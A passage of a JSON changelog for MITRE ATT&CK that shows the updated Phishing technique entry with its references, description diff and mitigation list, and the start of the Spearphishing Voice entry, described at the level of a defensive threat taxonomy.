                    "modified": "2026-04-17 16:14:54.713000+00:00",
                    "name": "Phishing",
                    "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \"thread hijacking\").(Citation: phishing-krebs)\n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1566",
                            "external_id": "T1566"
                        },
                        {
                            "source_name": "phishing-krebs",
                            "description": "Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That Prey on Your Curiosity. Retrieved September 27, 2024.",
                            "url": "https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/"
                        },
                        {
                            "source_name": "CISA Remote Monitoring and Management Software",
                            "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"
                        },
                        {
                            "source_name": "cyberproof-double-bounce",
                            "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.",
                            "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
                        },
                        {
                            "source_name": "Unit42 Luna Moth",
                            "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"
                        },
                        {
                            "source_name": "Microsoft OAuth Spam 2022",
                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
                        },
                        {
                            "source_name": "sygnia Luna Month",
                            "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.",
                            "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"
                        },
                        {
                            "source_name": "Proofpoint-spoof",
                            "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.",
                            "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 VBA Infostealer 2014",
                            "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Philip Winther",
                        "Ohad Zaidenberg, @ohad_mz",
                        "Liora Itkin",
                        "Liran Ravich, CardinalOps",
                        "Scott Cook, Capital One"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.7",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:14:54.713000+00:00\", \"old_value\": \"2025-10-24 17:49:11.351000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\\n\\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \\\"thread hijacking\\\").(Citation: phishing-krebs)\\n\\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)\", \"old_value\": \"Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\\n\\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \\\"thread hijacking\\\").(Citation: phishing-krebs)\\n\\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\\n \\n-Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \\\"thread hijacking\\\").(Citation: phishing-krebs)\\n+Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \\\"thread hijacking\\\").(Citation: phishing-krebs)\\n \\n Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"ACSC Email Spoofing\", \"description\": \"Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.\", \"url\": \"https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft Anti Spoofing\", \"description\": \"Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide\"}}}",
                    "previous_version": "2.7",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to7__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to7__0\"><a href=\"#difflib_chg_to7__top\">t</a></td><td class=\"diff_header\" id=\"from7_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;phishing&nbsp;messages&nbsp;to&nbsp;gain&nbsp;access&nbsp;to&nbsp;vic</td><td class=\"diff_next\"><a href=\"#difflib_chg_to7__top\">t</a></td><td class=\"diff_header\" id=\"to7_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;phishing&nbsp;messages&nbsp;to&nbsp;gain&nbsp;access&nbsp;to&nbsp;vic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tim&nbsp;systems.&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;electronically&nbsp;delive</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tim&nbsp;systems.&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;electronically&nbsp;delive</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">red&nbsp;social&nbsp;engineering.&nbsp;Phishing&nbsp;can&nbsp;be&nbsp;targeted,&nbsp;known&nbsp;as&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">red&nbsp;social&nbsp;engineering.&nbsp;Phishing&nbsp;can&nbsp;be&nbsp;targeted,&nbsp;known&nbsp;as&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pearphishing.&nbsp;In&nbsp;spearphishing,&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;compa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pearphishing.&nbsp;In&nbsp;spearphishing,&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;compa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny,&nbsp;or&nbsp;industry&nbsp;will&nbsp;be&nbsp;targeted&nbsp;by&nbsp;the&nbsp;adversary.&nbsp;More&nbsp;gene</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny,&nbsp;or&nbsp;industry&nbsp;will&nbsp;be&nbsp;targeted&nbsp;by&nbsp;the&nbsp;adversary.&nbsp;More&nbsp;gene</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rally,&nbsp;adversaries&nbsp;can&nbsp;conduct&nbsp;non-targeted&nbsp;phishing,&nbsp;such&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rally,&nbsp;adversaries&nbsp;can&nbsp;conduct&nbsp;non-targeted&nbsp;phishing,&nbsp;such&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;in&nbsp;mass&nbsp;malware&nbsp;spam&nbsp;campaigns.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;send&nbsp;vict</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;in&nbsp;mass&nbsp;malware&nbsp;spam&nbsp;campaigns.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;send&nbsp;vict</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ims&nbsp;emails&nbsp;containing&nbsp;malicious&nbsp;attachments&nbsp;or&nbsp;links,&nbsp;typica</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ims&nbsp;emails&nbsp;containing&nbsp;malicious&nbsp;attachments&nbsp;or&nbsp;links,&nbsp;typica</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lly&nbsp;to&nbsp;execute&nbsp;malicious&nbsp;code&nbsp;on&nbsp;victim&nbsp;systems.&nbsp;Phishing&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lly&nbsp;to&nbsp;execute&nbsp;malicious&nbsp;code&nbsp;on&nbsp;victim&nbsp;systems.&nbsp;Phishing&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;be&nbsp;conducted&nbsp;via&nbsp;third-party&nbsp;services,&nbsp;like&nbsp;social&nbsp;me</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;be&nbsp;conducted&nbsp;via&nbsp;third-party&nbsp;services,&nbsp;like&nbsp;social&nbsp;me</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dia&nbsp;platforms.&nbsp;Phishing&nbsp;may&nbsp;also&nbsp;involve&nbsp;social&nbsp;engineering&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dia&nbsp;platforms.&nbsp;Phishing&nbsp;may&nbsp;also&nbsp;involve&nbsp;social&nbsp;engineering&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;source,&nbsp;as&nbsp;well&nbsp;as&nbsp;e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;source,&nbsp;as&nbsp;well&nbsp;as&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vasive&nbsp;techniques&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vasive&nbsp;techniques&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;metadata/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;metadata/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">send&nbsp;messages&nbsp;(e.g.,&nbsp;[Email&nbsp;Hiding&nbsp;Rules](https://attack.mit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">send&nbsp;messages&nbsp;(e.g.,&nbsp;[Email&nbsp;Hiding&nbsp;Rules](https://attack.mit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/techniques/T1564/008)).(Citation:&nbsp;Microsoft&nbsp;OAuth&nbsp;Spa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/techniques/T1564/008)).(Citation:&nbsp;Microsoft&nbsp;OAuth&nbsp;Spa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;2022)(Citation:&nbsp;Palo&nbsp;Alto&nbsp;Unit&nbsp;42&nbsp;VBA&nbsp;Infostealer&nbsp;2014)&nbsp;An</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;2022)(Citation:&nbsp;Palo&nbsp;Alto&nbsp;Unit&nbsp;42&nbsp;VBA&nbsp;Infostealer&nbsp;2014)&nbsp;An</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">other&nbsp;way&nbsp;to&nbsp;accomplish&nbsp;this&nbsp;is&nbsp;by&nbsp;[Email&nbsp;Spoofing](https://</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">other&nbsp;way&nbsp;to&nbsp;accomplish&nbsp;this&nbsp;is&nbsp;by&nbsp;[Email&nbsp;Spoofing](https://</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T16<span class=\"diff_chg\">7</span>2)(Citation:&nbsp;Proofpoint-spoo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T16<span class=\"diff_chg\">84/00</span>2)(Citation:&nbsp;Proofpoint-</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">f)&nbsp;the&nbsp;identity&nbsp;of&nbsp;the&nbsp;sender,&nbsp;which&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;fool&nbsp;bot</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">spoof)&nbsp;the&nbsp;identity&nbsp;of&nbsp;the&nbsp;sender,&nbsp;which&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;fool</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;the&nbsp;human&nbsp;recipient&nbsp;as&nbsp;well&nbsp;as&nbsp;automated&nbsp;security&nbsp;tools,(C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;both&nbsp;the&nbsp;human&nbsp;recipient&nbsp;as&nbsp;well&nbsp;as&nbsp;automated&nbsp;security&nbsp;tool</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;cyberproof-double-bounce)&nbsp;or&nbsp;by&nbsp;including&nbsp;the&nbsp;inten</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,(Citation:&nbsp;cyberproof-double-bounce)&nbsp;or&nbsp;by&nbsp;including&nbsp;the&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ded&nbsp;target&nbsp;as&nbsp;a&nbsp;party&nbsp;to&nbsp;an&nbsp;existing&nbsp;email&nbsp;thread&nbsp;that&nbsp;inclu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntended&nbsp;target&nbsp;as&nbsp;a&nbsp;party&nbsp;to&nbsp;an&nbsp;existing&nbsp;email&nbsp;thread&nbsp;that&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">des&nbsp;malicious&nbsp;files&nbsp;or&nbsp;links&nbsp;(i.e.,&nbsp;\"thread&nbsp;hijacking\").(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ncludes&nbsp;malicious&nbsp;files&nbsp;or&nbsp;links&nbsp;(i.e.,&nbsp;\"thread&nbsp;hijacking\").</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;phishing-krebs)&nbsp;&nbsp;Victims&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishing&nbsp;me</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;phishing-krebs)&nbsp;&nbsp;Victims&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ssages&nbsp;that&nbsp;instruct&nbsp;them&nbsp;to&nbsp;call&nbsp;a&nbsp;phone&nbsp;number&nbsp;where&nbsp;they&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;messages&nbsp;that&nbsp;instruct&nbsp;them&nbsp;to&nbsp;call&nbsp;a&nbsp;phone&nbsp;number&nbsp;where&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;directed&nbsp;to&nbsp;visit&nbsp;a&nbsp;malicious&nbsp;URL,&nbsp;download&nbsp;malware,(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hey&nbsp;are&nbsp;directed&nbsp;to&nbsp;visit&nbsp;a&nbsp;malicious&nbsp;URL,&nbsp;download&nbsp;malware,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;sygnia&nbsp;Luna&nbsp;Month)(Citation:&nbsp;CISA&nbsp;Remote&nbsp;Monitoring&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;sygnia&nbsp;Luna&nbsp;Month)(Citation:&nbsp;CISA&nbsp;Remote&nbsp;Monitori</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;Management&nbsp;Software)&nbsp;or&nbsp;install&nbsp;adversary-accessible&nbsp;remo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;and&nbsp;Management&nbsp;Software)&nbsp;or&nbsp;install&nbsp;adversary-accessible&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">te&nbsp;management&nbsp;tools&nbsp;onto&nbsp;their&nbsp;computer&nbsp;(i.e.,&nbsp;[User&nbsp;Executi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">remote&nbsp;management&nbsp;tools&nbsp;onto&nbsp;their&nbsp;computer&nbsp;(i.e.,&nbsp;[User&nbsp;Exe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on](https://attack.mitre.org/techniques/T1204)).(Citation:&nbsp;U</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cution](https://attack.mitre.org/techniques/T1204)).(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nit42&nbsp;Luna&nbsp;Moth)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Unit42&nbsp;Luna&nbsp;Moth)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1021: Restrict Web-Based Content",
                            "M1031: Network Intrusion Prevention",
                            "M1047: Audit",
                            "M1049: Antivirus/Antimalware",
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0070: Detection Strategy for Phishing across platforms."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-07 21:50:08.827000+00:00",
                    "modified": "2026-04-17 16:04:48.737000+00:00",
                    "name": "Spearphishing Voice",
                    "description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1566/004",
                            "external_id": "T1566.004"
                        },
                        {
                            "source_name": "CISA Remote Monitoring and Management Software",
                            "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"
                        },
                        {
                            "source_name": "Unit42 Luna Moth",
                            "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"
                        },
                        {
                            "source_name": "sygnia Luna Month",
                            "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.",
                            "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"
                        },
                        {
                            "source_name": "Proofpoint Vishing",
                            "description": "Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.",
                            "url": "https://www.proofpoint.com/us/threat-reference/vishing"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
